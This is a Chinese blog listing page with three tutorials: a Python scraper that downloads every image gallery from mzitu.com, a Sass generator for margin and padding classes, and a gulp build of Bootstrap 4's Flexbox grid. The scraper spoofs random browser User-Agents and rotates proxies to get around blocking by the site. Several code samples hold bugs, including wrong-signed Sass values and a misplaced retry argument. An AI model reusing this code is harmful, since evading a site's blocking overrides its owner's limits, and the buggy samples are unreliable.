            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1",
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24",
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]

    def get(self, url, timeout, proxy=None, num_retries=6): ##给函数一个默认参数proxy为空
        UA = random.choice(self.user_agent_list) ##从self.user_agent_list中随机取出一个字符串
        headers = {'User-Agent': UA}  ##构造成一个完整的User-Agent （UA代表的是上面随机取出来的字符串哦）

        if proxy == None: ##当代理为空时，不使用代理获取response（别忘了response啥哦！之前说过了！！）
            try:
                return requests.get(url, headers=headers, timeout=timeout)##这样服务器就会以为我们是真的浏览器了
            except:##如过上面的代码执行报错则执行下面的代码

                if num_retries > 0: ##num_retries是我们限定的重试次数
                    time.sleep(10) ##延迟十秒
                    print(u'获取网页出错，10S后将获取倒数第：', num_retries, u'次')
                    return self.get(url, timeout, num_retries-1)  ##调用自身 并将次数减1
                else:
                    print(u'开始使用代理')
                    time.sleep(10)
                    IP = ''.join(str(random.choice(self.iplist)).strip()) ##下面有解释哦
                    proxy = {'http': IP}
                    return self.get(url, timeout, proxy,) ##代理不为空的时候

        else: ##当代理不为空
            try:
                IP = ''.join(str(random.choice(self.iplist)).strip()) ##将从self.iplist中获取的字符串处理成我们需要的格式（处理了些什么自己看哦，这是基础呢）
                proxy = {'http': IP} ##构造成一个代理
                return requests.get(url, headers=headers, proxies=proxy, timeout=timeout) ##使用代理获取response
            except:

                if num_retries > 0:
                    time.sleep(10)
                    IP = ''.join(str(random.choice(self.iplist)).strip())
                    proxy = {'http': IP}
                    print(u'正在更换代理，10S后将重新获取倒数第', num_retries, u'次')
                    print(u'当前代理是：', proxy)
                    return self.get(url, timeout, proxy, num_retries - 1)
                else:
                    print(u'代理也不好使了！取消代理')
                    return self.get(url, 3)

request = download()  ##

这个模块就多了 request = download() 第二个（def mzitu.py）:

from bs4 import BeautifulSoup
import os
from Download import request ##导入模块变了一下
from pymongo import MongoClient

class mzitu():


    def all_url(self, url):

        html = request.get(url, 3) ##这儿更改了一下（是不是发现  self 没见了？）
        all_a = BeautifulSoup(html.text, 'lxml').find('div', class_='all').find_all('a')
        for a in all_a:
            title = a.get_text()
            print(u'开始保存：', title)
            path = str(title).replace("?", '_')
            self.mkdir(path)
            os.chdir("D:\mzitu\\"+path)
            href = a['href']
            self.html(href)

    def html(self, href):
        html = request.get(href, 3)##这儿更改了一下（是不是发现  self 没见了？）
        max_span = BeautifulSoup(html.text, 'lxml').find_all('span')[10].get_text()
        for page in range(1, int(max_span) + 1):
            page_url = href + '/' + str(page)
            self.img(page_url)

    def img(self, page_url):
        img_html = request.get(page_url, 3) ##这儿更改了一下（是不是发现  self 没见了？）
        img_url = BeautifulSoup(img_html.text, 'lxml').find('div', class_='main-image').find('img')['src']
        self.save(img_url)

    def save(self, img_url):
        name = img_url[-9:-4]
        print(u'开始保存：', img_url)
        img = request.get(img_url, 3) ##这儿更改了一下（是不是发现  self 没见了？）
        f = open(name + '.jpg', 'ab')
        f.write(img.content)
        f.close()

    def mkdir(self, path):
        path = path.strip()
        isExists = os.path.exists(os.path.join("D:\mzitu", path))
        if not isExists:
            print(u'建了一个名字叫做', path, u'的文件夹！')
            os.makedirs(os.path.join("D:\mzitu", path))
            return True
        else:
            print(u'名字叫做', path, u'的文件夹已经存在了！')
            return False




Mzitu = mzitu() ##实例化
Mzitu.all_url('http://www.mzitu.com/all') ##给函数all_url传入参数  你可以当作启动爬虫（就是入口）

改动的地方我都有明确标注哦！仔细看看有什么不同吧。

作者哎哟卧槽发表于 2016-10-30 阅读次数：本文字数： 23k 阅读时长 ≈ 21 分钟

HTML 利用Sass自动生成padding和margin边距样式

需求分析

有需求才有动力！写CSS的时候，你经常会遇到要设置一个小边距，比如设置：所有内边距10px，外左边距20px，内右边距0，上下内边距50px，外左右边距自动…. 而你是不是又不想自己单独为它们定义一个class，然后把padding, margin之类的写进去？举例如下：现在我有两个p标签，我想让这两个p标签中间相隔10px，那是不是需要？

1 2	<p style="margin-bottom:10px">Hello</p> <p>World</p>

又或者

<p class="m">Hello</p>
<p>World</p>

.m {
    margin-bottom: 10px;
}

类似这样的情况多了去了，每次都要定个样式就为了解决个边距问题？能忍吗？能忍吗？反正我是不能忍。改改改，燥起来！

协议规定

那么为了解决这么一个问题，我们首先要想好解决标准。

边距层级

首先边距问题，我们首先要定义这么几个层级：极小、很小、小、正常、中等、大、很大、极大。对应的边距划分为： 2px、5px、10px、15px、20px、30px、40px、50px。那么代号就标记为： xxs、xs、sm、‘空’、md、lg、xl、xxl。另外我们还有其他的样式，比如自动auto、初始化initial、继承inherit、无边距none。那么代号标记为auto、ii、ih、none。这样的划分基本可以满足需求。

简称划分

然后定义几个简称：我们用到的单词有内边距、外边距、上下左右等，那么定义如下： padding->p、margin->m、right->r、left->l、top->t、bottom->b、horizontal->h、vertical->v。其中horizontal和vertical指代水平方向和垂直方向，也就是同时设置左右或者同时设置上下。当然不能忽略了反向边距，比如外边距是负10px，这个也需要用一个简称，我们定义为n，是反向的意思。如此一来，所有的简称和边距就规定好了。

实例说明

通过上面的层级关系和简称划分，我们可以对他们进行自由组合，形成一个个class样式。比如： .p-t-xs 即为上内边距是5px，.p-h-md 即为左右内边距是20px，.p-b-n-lg 即为下内边距是-30px， .p-r-xxl 即为右内边距是50px，.p-t 即为上内边距为正常边距15px（正常边距省略即可），.p-n 即为内边距是-15px。 .p-v-n 即为上下内边距是-15px，.m-h-auto 即为水平左右外边距是自动auto, .m-t-ii 即为上外边距是初始化initial。 .m-r-none 即为右外边距是0。怎样？通过这样的定义，能不能找出规律？即第一个字母p或者m，代表padding或者margin。第二个字母代表方向，t上方、b下方、l左方、r右方、v上方和下方、h左方和右方。第三个（组）字母代表距离，xs是+2px，n-lg是-30px，空是自动边距15px，n是反向正常值-15px，ii是初始化，none是无，auto是自动边距。怎样？有了这些定义，我们是不是就能非常方便地设置边距样式了？刚才的边距怎样解决？很简单，只需要

1 2	<p class="m-b-sm">Hello</p> <p>World</p>

如果一个网页里有很多样式，那只需要把整个样式文件引入，自由地添加class就好了。

编写Sass

这么多组合呢？写CSS不累死了？检查也不好检查。怎么办？上Sass！首先我们先定义一层映射，边距映射：

1
2

$map: (none: 0, auto: auto, ii: initial, ih: inherit, xxs: 2px, xs: 5px, sm: 10px, '': 15px, md: 20px, lg: 30px, xl: 40px, xxl: 50px,
        n-xxs: -2px, n-xs: -5px, n-sm: -10px, n: -15px, n-md: 20px, n-lg: 30px, n-xl: -40px, n-xxl: -50px);

这里定义了所有的边距和它的简称。然后我们尝试写一下padding的函数，遍历一下：

@each $style, $padding in $map {
 .p-#{$style} {
   padding: $padding !important;
 }
}

这，那空的咋办? 不能留个下划线啊。判断一下

@function line($style) {
  @if $style != '' {
    @return '-';
  } @else {
    @return '';
  }
}

@each $style, $padding in $map {
  $line: line($style);
 .p#{line}#{$style} {
   padding: $padding !important;
 }
}

这样我们就生成了所有padding边距的设置。好接下来设置下水平和垂直边距吧，这个就需要两句话了，比如设置水平你得写padding-left 和 padding-right。有的小伙伴说了，可以直接写一个啊，比如 padding: 0 20px 就可以，不过这样你同时设置了上下边距。即便上下边距我们设置成inherit或者什么其他的，那也多多少少在某种情况下产生影响。所以这里我们直接分开，而且就算不分开，你之前的映射就要修改，还是麻烦的。所以这里定义如下：

@each $style, $padding in $map {
    $line: line($style);
    .p-v#{$line}#{$style} {
      padding-top: $padding !important;
      padding-bottom: $padding !important;
    }
  }
  
  @each $style, $padding in $map {
    $line: line($style);
    .p-h#{$line}#{$style} {
      padding-left: $padding !important;
      padding-right: $padding !important;
    }
  }

那最后，单边距的定义如下，我们给它加个循环：

$directions: (t: top, b: bottom, l: left, r:right);
  @each $d-key, $d-value in $directions {
    @each $style, $padding in $map {
      $line: line($style);
      .p-#{$d-key}#{$line}#{$style} {
        padding-#{$d-value}: $padding !important;
      }
    }
  }

如此一来，padding的就写好了！那么margin的怎么办？很简单，再加一层循环，最终代码如下：

@function line($style) {
  @if $style != '' {
    @return '-';
  } @else {
    @return '';
  }
}

$map: (none: 0, auto: auto, ii: initial, ih: inherit, xxs: 2px, xs: 5px, sm: 10px, '': 15px, md: 20px, lg: 30px, xl: 40px, xxl: 50px,
        n-xxs: -2px, n-xs: -5px, n-sm: -10px, n: -15px, n-md: 20px, n-lg: 30px, n-xl: -40px, n-xxl: -50px);

$names: (m: margin, p: padding);
@each $n-key, $n-value in $names {
  @each $style, $padding in $map {
    $line: line($style);
    .#{$n-key}#{$line}#{$style} {
      #{$n-value}: $padding !important;
    }
  }

  @each $style, $padding in $map {
    $line: line($style);
    .#{$n-key}-v#{$line}#{$style} {
      #{$n-value}-top: $padding !important;
      #{$n-value}-bottom: $padding !important;
    }
  }

  @each $style, $padding in $map {
    $line: line($style);
    .#{$n-key}-h#{$line}#{$style} {
      #{$n-value}-left: $padding !important;
      #{$n-value}-right: $padding !important;
    }
  }

  $directions: (t: top, b: bottom, l: left, r:right);
  @each $d-key, $d-value in $directions {
    @each $style, $padding in $map {
      $line: line($style);
      .#{$n-key}-#{$d-key}#{$line}#{$style} {
        #{$n-value}-#{$d-value}: $padding !important;
      }
    }
  }
}

如此一来，Sass便成功生成了。

编译

写完了那自然要编译一下咯，废话不多说上gulp。

gulp.task('styles', () => {
    return gulp.src(path.sass)
    .pipe(plumber())
    .pipe(sourcemaps.init())
    .pipe(sass({outputStyle: 'compressed'}).on('error', sass.logError))
    .pipe(sourcemaps.write())
    .pipe(autoprefixer({
        browsers: ['last 2 versions'],
        cascade: true,
        remove: true
    }))
    .pipe(gulp.dest(path.dest.css));
});

或者你们有考拉编译器啊或者其他的都行，能编译就好。生成的部分结果展示如下：

.m-none{margin:0 !important}.m-auto{margin:auto !important}.m-ii{margin:initial !important}.m-ih{margin:inherit !important}.m-xxs{margin:2px !important}.m-xs{margin:5px !important}.m-sm{margin:10px !important}.m{margin:15px !important}.m-md{margin:20px !important}.m-lg{margin:30px !important}.m-xl{margin:40px !important}.m-xxl{margin:50px !important}.m-n-xxs{margin:-2px !important}.m-n-xs{margin:-5px !important}.m-n-sm{margin:-10px !important}.m-n{margin:-15px !important}.m-n-md{margin:20px !important}.m-n-lg{margin:30px !important}.m-n-xl{margin:-40px !important}.m-n-xxl{margin:-50px !important}.m-v-none{margin-top:0 !important;margin-bottom:0 !important}.m-v-auto{margin-top:auto !important;margin-bottom:auto !important}.m-v-ii{margin-top:initial !important;margin-bottom:initial !important}.m-v-ih{margin-top:inherit !important;margin-bottom:inherit !important}.m-v-xxs{margin-top:2px !important;margin-bottom:2px !important}.m-v-xs{margin-top:5px !important;margin-bottom:5px !important}.m-v-sm{margin-top:10px !important;margin-bottom:10px !important}.m-v{margin-top:15px !important;margin-bottom:15px !important}.m-v-md{margin-top:20px !important;margin-bottom:20px !important}.m-v-lg{margin-top:30px !important;margin-bottom:30px !important}.m-v-xl{margin-top:40px !important;margin-bottom:40px !important}

具体的结果等你自己编译一下看看就好啦。

资源下载

当然有的小伙伴一定嫌麻烦，别急，我这都给你准备好了，编译好的结果放送给大家！ pm.css pm.min.css 需要使用的小伙伴们直接在HTML代码中引入就好啦！

1 2	<link rel="stylesheet" href="http://res.cuiqingcai.com/css/pm.css"> <link rel="stylesheet" href="http://res.cuiqingcai.com/css/pm.min.css">

本文介绍了使用Sass自定义边距样式的流程，希望对大家有帮助！

作者崔庆才发表于 2016-10-29 阅读次数：本文字数： 6.7k 阅读时长 ≈ 6 分钟

HTML BootStrap4提取并编译Flexbox Grid系统

前言

首先 Flexbox 是什么？它是 Bootstrap4 新出的一个布局格式，对移动端开发非常方便。说一下我为什么要提取 Flexbox。有需求才有动力，首先是需求，最近在开发一个移动端适配的网站，使用了 materi-ui 框架，基于 React。使用 materi-ui 时，已经内置了许多样式，但是 bootstrap 的一些多余样式会影响一些现有样式，而那些样式对我又没啥用。另外 Flex 对于移动端布局开发非常适合，这次正好也拿来练练手。移动端开发是趋势，随着移动端的发展，BootStrap 也出了新版本 4，不过现在还是 alpha 版本，还没正式推出。其中一个比较大的改进便是 Flexbox Grid 系统。 BootStrap 原本最常用的布局栅格化系统在做响应式开发的时候比较方便，但是只针对于移动端开发的时候并没有多大用处了，流行的 Flex 布局应用越来越广泛。在 Founation 中，看到过有了这种 Flex 布局，它就是适应手机开发的框架。后来 Bootstrap4 也增加了这块。那么 Flexbox Grid 系统相比之前什么改进呢？请看官方文档实例。 Flexbox Grid P.S 别去上什么中文网，全是错误，实例结果有问题。不想吐槽，一开始我还以为是 Flexbox Grid 设计不科学。

准备工作

首先下载 BootStrap V4。 Bootstrap V4 目前最新版还是 alpha 版本，如链接失效，请移步官网。 BootStrap 然后你需要安装了 node，gulp，自行下载即可。 gulp

开始抽取

下载之后打开 Bootstrap 源代码文件夹，找到 scss 目录，可以看到如下的结构。 mixins 是一些可调用的组件，本身编译不会产生任何结果。utilities 是一些公用的包，比如我们要抽取的 Flex 就在这里面。外面的这么多是一些公用的基本组件。通过官方文档可以发现：

If you’re familiar with modifying variables in Sass—or any other CSS preprocessor—you’ll be right at home to move into flexbox mode.

Open the _variables.scss file and find the $enable-flex variable.

Change it from false to true.

Recompile, and done!

Alternatively, if you don’t need the source Sass files, you may swap the default Bootstrap compiled CSS with the compiled flexbox variation. Head to the download page for more information.

如果我们想要添加 Flex 组件，还需要将这个变量更改，即将$enable-flex 改成 true 才可以，默认是 false。在源代码中我们可以发现已经有了一个 bootstrap-flex.scss 的文件，然而这里面发现直接引入了 bootstrap 的所有代码，这并不是我们想要的，它可能会复写一些基本样式，会影响我们的工程。我们想要的是单独把 Flex 部分抽离出来。所以我们自己新建一个 bootstrap-flex.scss 的空文件。首先将变量改为 true

1	$enable-flex: true;

然后阅读源码可以发现有两个公用的 scss 文件是必须引入的。 variables 和 breakpoints，我们先将他们引入。

1 2	@import "variables"; @import "breakpoints";

然后观察带有 flex 的代码，只发现了在 utilities 文件夹中有相关内容，跑不了了，那就是它，复制到同一路径，引入一下。

1	@import "flex";

不过发现这个文件里的样式颇少，内容如下：

// Flex variation
//
// Custom styles for additional flex alignment options.

@if $enable-flex {
  @each $breakpoint in map-keys($grid-breakpoints) {
    // Flex column reordering
    @include media-breakpoint-up($breakpoint) {
      .flex-#{$breakpoint}-first { order: -1; }
      .flex-#{$breakpoint}-last { order: 1; }
      .flex-#{$breakpoint}-unordered { order: 0; }
    }

    // Alignment for every item
    @include media-breakpoint-up($breakpoint) {
      .flex-items-#{$breakpoint}-top { align-items: flex-start; }
      .flex-items-#{$breakpoint}-middle { align-items: center; }
      .flex-items-#{$breakpoint}-bottom { align-items: flex-end; }
    }

    // Alignment per item
    @include media-breakpoint-up($breakpoint) {
      .flex-#{$breakpoint}-top   { align-self: flex-start; }
      .flex-#{$breakpoint}-middle { align-self: center; }
      .flex-#{$breakpoint}-bottom { align-self: flex-end; }
    }

    // Horizontal alignment of item
    @include media-breakpoint-up($breakpoint) {
      .flex-items-#{$breakpoint}-left { justify-content: flex-start; }
      .flex-items-#{$breakpoint}-center { justify-content: center; }
      .flex-items-#{$breakpoint}-right { justify-content: flex-end; }
      .flex-items-#{$breakpoint}-around { justify-content: space-around; }
      .flex-items-#{$breakpoint}-between { justify-content: space-between; }
    }
  }
}

这才多点啊？看官方实例明明用到了 row，col 这些样式好不好。再看看。于是乎发现这些实际上也是依赖于原始的 grid 样式的。我们必须也要把它引入进来。找找，发现了三个相关文件，拷贝过来，引入。

1
2
3

@import "mixins/grid";
@import "mixins/grid-framework";
@import "grid";

嗯，这下应该全了。结构如下所示

编译代码

官方用的是 grunt 自动化工具，然而我用着并不习惯。在这里我们用到 gulp 来编译。首先 npm init 初始化一个 package.json 引入一些包

"devDependencies": {
  "babel-core": "^6.3.26",
  "babel-preset-es2015": "^6.16.0",
  "babel-register": "^6.18.0",
  "del": "^2.2.2",
  "gulp": "^3.9.1",
  "gulp-autoprefixer": "^3.1.1",
  "gulp-babel": "^6.1.2",
  "gulp-plumber": "^1.1.0",
  "gulp-postcss": "^6.2.0",
  "gulp-sass": "^2.3.2",
  "gulp-sourcemaps": "^2.2.0",
  "postcss-scss": "^0.3.1"
}

整体的结构如下

{
  "name": "bootstrap-flex",
  "version": "1.0.0",
  "description": "BootStrap Flex",
  "main": "gulpfile.babel.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "Germey",
  "license": "MIT",
  "devDependencies": {
    "babel-core": "^6.3.26",
    "babel-preset-es2015": "^6.16.0",
    "babel-register": "^6.18.0",
    "del": "^2.2.2",
    "gulp": "^3.9.1",
    "gulp-autoprefixer": "^3.1.1",
    "gulp-babel": "^6.1.2",
    "gulp-plumber": "^1.1.0",
    "gulp-postcss": "^6.2.0",
    "gulp-sass": "^2.3.2",
    "gulp-sourcemaps": "^2.2.0",
    "postcss-scss": "^0.3.1"
  }
}

执行

1	npm install

安装一下 node_modules。然后生成一个.babelrc 文件，因为我们要用 es2015 的语法，内容。

{
  "presets": [
    "es2015"
  ]
}

然后写一下 gulpfile.babel.js

import gulp       from 'gulp';
import plumber from 'gulp-plumber';
import sass from 'gulp-sass';
import sourcemaps from 'gulp-sourcemaps';
import del from 'del';
import autoprefixer from 'gulp-autoprefixer';
const source = ['sass/**/*.scss'];
const dest = 'dist/css/';

gulp.task('sass', () => {
    return gulp.src(source)
    .pipe(plumber())
    .pipe(sourcemaps.init())
    .pipe(sass({outputStyle: 'compressed'}).on('error', sass.logError))
    .pipe(sourcemaps.write())
    .pipe(autoprefixer({
        browsers: ['last 2 versions'],
        cascade: true,
        remove: true
    }))
    .pipe(gulp.dest(dest));
});

gulp.task('clean', del.bind(null, ['dist']));

gulp.task('build', ['sass', 'watch'])

gulp.task('watch', () => {
    gulp.watch(source, ['sass']);
});

gulp.task('default', ['clean'], () => {
    gulp.start('build');
});

比较简单，用到的有 sass, sourcemaps, autoprefixer 这几个比较常用的包。执行

gulp

观察下结果。

[18:46:38] Requiring external module babel-register
[18:46:38] Using gulpfile /private/var/www/flex/gulpfile.babel.js
[18:46:38] Starting 'clean'...
[18:46:38] Finished 'clean' after 8.12 ms
[18:46:38] Starting 'default'...
[18:46:38] Starting 'sass'...
[18:46:38] Starting 'watch'...
[18:46:38] Finished 'watch' after 9.63 ms
[18:46:38] Finished 'default' after 25 ms
[18:46:39] Finished 'sass' after 312 ms
[18:46:39] Starting 'build'...
[18:46:39] Finished 'build' after 2.41 μs

恩，没什么问题。可以看到 dist 文件夹下生成了一个文件叫做 bootstrap-flex.css。

测试用例

恩接下来我们来测试一下官方实例是否正常。新建一个 index.html 内容如下

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <link rel="stylesheet" href="dist/css/bootstrap-flex.css">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-xs">
            1 of 2
        </div>
        <div class="col-xs">
            1 of 2
        </div>
    </div>
    <div class="row">
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs">
            1 of 3
        </div>
    </div>

</div>
<div class="container">
    <div class="row">
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs-6">
            2 of 3 (wider)
        </div>
        <div class="col-xs">
            3 of 3
        </div>
    </div>
    <div class="row">
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs-5">
            2 of 3 (wider)
        </div>
        <div class="col-xs">
            3 of 3
        </div>
    </div>
</div>
<div class="container">
    <div class="row">
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs-6">
            2 of 3 (wider)
        </div>
        <div class="col-xs">
            3 of 3
        </div>
    </div>
    <div class="row">
        <div class="col-xs">
            1 of 3
        </div>
        <div class="col-xs-5">
            2 of 3 (wider)
        </div>
        <div class="col-xs">
            3 of 3
        </div>
    </div>
</div>
<div class="container">
    <div class="row flex-items-xs-top">
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
    </div>
    <div class="row flex-items-xs-middle">
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
    </div>
    <div class="row flex-items-xs-bottom">
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
        <div class="col-xs">
            One of three columns
        </div>
    </div>
</div>
<div class="container">
    <div class="row flex-items-xs-left">
        <div class="col-xs-4">
            One of two columns
        </div>
        <div class="col-xs-4">
            One of two columns
        </div>
    </div>
    <div class="row flex-items-xs-center">
        <div class="col-xs-4">
            One of two columns
        </div>
        <div class="col-xs-4">
            One of two columns
        </div>
    </div>
    <div class="row flex-items-xs-right">
        <div class="col-xs-4">
            One of two columns
        </div>
        <div class="col-xs-4">
            One of two columns
        </div>
    </div>
    <div class="row flex-items-xs-around">
        <div class="col-xs-4">
            One of two columns
        </div>
        <div class="col-xs-4">
            One of two columns
        </div>
    </div>
    <div class="row flex-items-xs-between">
        <div class="col-xs-4">
            One of two columns
        </div>
        <div class="col-xs-4">
            One of two columns
        </div>
    </div>
</div>
<div class="container">
    <div class="row">
        <div class="col-xs flex-xs-unordered">
            First, but unordered
        </div>
        <div class="col-xs flex-xs-last">
            Second, but last
        </div>
        <div class="col-xs flex-xs-first">
            Third, but first
        </div>
    </div>
</div>
<style>
    .row {
        margin-top: 1rem;
    }
    .row > [class^="col-"] {
        padding-top: .75rem;
        padding-bottom: .75rem;
        background-color: rgba(86, 61, 124, 0.15);
        border: 1px solid rgba(86, 61, 124, 0.2);
    }
    .flex-items-xs-top, .flex-items-xs-middle,.flex-items-xs-bottom {
        min-height: 6rem;
        background-color: rgba(255, 0, 0, 0.1);
    }
</style>

</body>
</html>

我把官方实例拿过来测试一下。结果如下所示恩，完美！至于这个布局的用法，那就去官方文档领悟吧，和之前的 bootstrap 栅格化布局有比较大的不同。不过如果你看了实例之后，就会豁然开朗了。

代码

本用例代码已上传到 GitHub。代码实例有兴趣的小伙伴可以下载测试。

结语

本文讲解了利用抽取 Bootstrap V4 中的 Flex 布局方式以及用 gulp 重新编译 Bootstrap 的过程，希望对大家有帮助。

作者崔庆才发表于 2016-10-29 阅读次数：本文字数： 9.9k 阅读时长 ≈ 9 分钟

Python 小白爬虫第一弹之抓取妹子图

2018 年 12 月 11 日入口页面多了一个连接早期图片更新了处理过后的代码（删掉了早期图片的 URL，大家可以自己尝试下载这个页面下的所有套图） 2017 年 8 月 30 日：mzitu.com 更新了防盗链导致下载图片全部失效，已更新处理办法： scrapy 版本也已更新 2017 年 4 月 24 日：用 scrapy 重写了一个 mzitu 的全站爬虫：小白进阶之 Scrapy 第四篇（图片下载管道篇） 2017 年 3 月 31 号更新 http://www.mzitu.com/all 这个地址已经被站长屏蔽了。下面的代码没法使了哦！仅提供学习方法。 PS：更改了一个新手比较难理解的坑（切换目录的问题），大陆之外的小伙伴儿需要翻墙，mzitu.com 对大陆之外好像不可访问。倒数第四个代码块儿是没有函数的脚本写法，看函数有困难的小伙伴儿，可以先看看这个。这是一篇完全给新手写的爬虫教程、也是我第一次写博文···也不知道怎么写（我也是个菜鸟啊！各路大神拍砖轻点儿啊！）由于经常在群里装逼加上群主懒啊（你看有多久没更新文章就知道了），让我来一篇爬虫的教程。如此装逼机会怎么能错过，今天我来给大家来一篇基础爬虫教程。你要问目标是啥？要知道 XX 才是学习最大的动力啊！所以目标就是 mzitu.com , （废话真多还不开始），下面请各位跟我的教程一步一步走，喂！！说的就是你啊！别看着了，照着教程做啊！ 1、基础环境部分： 工欲其事必先利器，要想把心爱的妹子搬进你的给她准备的房子，总得有几把斧子才行啊！下面这就是几把斧子！ 1.1：Python 基础运行环境：本篇教程采用 Python3 来写，所以你需要给你的电脑装上 Python3 才行，我就说说 Windows 的环境（会玩 Linux 的各位应该不需要我多此一举了）。 anaconda （点我下载）（这是一个 Python 的科学计算发行版本，作者打包好多好多的包，不知道干啥的没关系，你只需要知道拥有它之后，那些 Windows 下 pip 安装包报错的问题将不复存在）下载不顺利的同学我已经传到百度云了：http://pan.baidu.com/s/1boAYaTL 1.2：Requests urllib 的升级版本打包了全部功能并简化了使用方法（点我查看官方文档） 1.3： beautifulsoup 是一个可以从 HTML 或 XML 文件中提取数据的 Python 库.它能够通过你喜欢的转换器实现惯用的文档导航,查找,修改文档的方式.（点我查看官方文档）（作为一个菜鸟就别去装逼用正则表达式了，匹配不到想要的内容，容易打击积极性。老老实实的用beautifulsoup 吧！虽然性能差了点、但是你会爱上它的。） 1.4：LXML 一个 HTML 解析包用于辅助 beautifulsoup 解析网页（如果你不用 anaconda，你会发现这个包在 Windows 下 pip 安装报错，用了就不会啦。）。上面的模块需要单独安装，下面几个就不用啦。 1.5： OS 系统内置模块下面是ＩＤＥ　你喜欢用什么就用什么啦！ 1.6： PyCharm 一个草鸡好用的 PythonIDE 工具、真滴！草鸡好用··（我是下载地址）试用三十天足够完成这个小爬虫啦。（如果你电脑已经存在 Python 环境又需要使用 anaconda 的话，请按照下面的图设置一下哦！）好啦、下面开始安装需要的模块。因为我安装的是anaconda这个科学计算的发行版，安装方式是酱紫滴：conda install 包名（当然 pip install 包名也是可以的哦！）

conda install requests
conda install beautifulsoup4
conda install lxml
或者
pip install requests
pip install beautifulsoup4
pip install lxml

大概界面就是上面的样子了。其余类似安装即可，好啦下面开始正题了首先我们打开 PyCharm 新建一个 Python 文件，写入以下代码（喂喂！不要复制哦自己敲一遍印象更佳啦。）

1
2
3

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os

好啦！准备工作完了、我们来开始让妹子到碗里来吧ヽ(●-`Д´-)ノ一个简单爬虫的诞生大慨需要下面几个步骤。（我知道图很简陋、请务必不要吐槽）

爬虫入口：顾名思义我需要程序从什么地方开始获取网页
存储数据：如果获取的网页有你需要的内容则取出数据保存
找到资料所在的地址：如果你你获取到的网页没有你需要的数据、但是有前往该数据页面的地址 URL、则获取这个地址 URL，再获取该 URL 的页面内容（也就等于当作爬虫入口了）

好啦！图很简陋、将就着看看，现在来开始看看网页找一个爬虫入口（开始爬取的页面）良心站长啊！居然有一个页面有整站所有的数据地址是http://www.mzitu.com/all 我们就以这个页面开始爬取（PS：真良心站长）下面是我们的第一段代码：用作获取http://www.mzitu.com/all这个页面。

import requests ##导入requests
from bs4 import BeautifulSoup ##导入bs4中的BeautifulSoup
import os

headers = {'User-Agent':"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1"}##浏览器请求头（大部分网站没有这个请求头会报错、请务必加上哦）
all_url = 'http://www.mzitu.com/all'  ##开始的URL地址
start_html = requests.get(all_url,  headers=headers)  ##使用requests中的get方法来获取all_url(就是：http://www.mzitu.com/all这个地址)的内容 headers为上面设置的请求头、请务必参考requests官方文档解释
print(start_html.text) ##打印出start_html (请注意，concent是二进制的数据，一般用于下载图片、视频、音频、等多媒体内容是才使用concent, 对于打印网页内容请使用text)

